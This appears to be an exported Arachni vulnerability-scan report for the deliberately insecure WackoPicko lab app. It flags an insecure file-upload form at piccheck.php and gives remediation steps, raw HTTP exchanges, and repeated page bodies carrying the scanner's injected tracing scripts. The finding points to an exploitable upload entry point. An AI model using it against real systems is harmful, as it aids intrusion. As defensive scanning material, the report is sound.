The identified page should at a minimum:

  1. Whitelist permitted file types and block all others. This should be conducted on the MIME type of the file rather than its extension.
  2. As the file is uploaded, and prior to being handled (written to the disk) by the server, the filename should be stripped of all control, special, or Unicode characters.
  3. Ensure that the upload is conducted via the HTTP POST method rather than GET or PUT.
  4. Ensure that the file is written to a directory that does not hold any execute permission and that all files within that directory inherit the same permissions.
  5. Scan (if possible) with an up-to-date virus scanner before being stored.
  6. Ensure that the application handles files as per the host operating system. For example, the length of the file name is appropriate, there is adequate space to store the file, protection against overwriting other files etc.
Proof
<input name="userfile" type="file">
</input>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST">
  <input type="hidden" name="MAX_FILE_SIZE" value="30000">
  </input>
  Check this file:
  <input name="userfile" type="file">
  </input>
  <br>
  </br>
  With this name:
  <input name="name" type="text">
  </input>
  <br>
  </br>
  <br>
  </br>
  <input type="submit" value="Send File">
  </input>
  <br>
  </br>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/piccheck.php
MAX_FILE_SIZE
30000
userfile
name
MAX_FILE_SIZE
30000
userfile
name
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
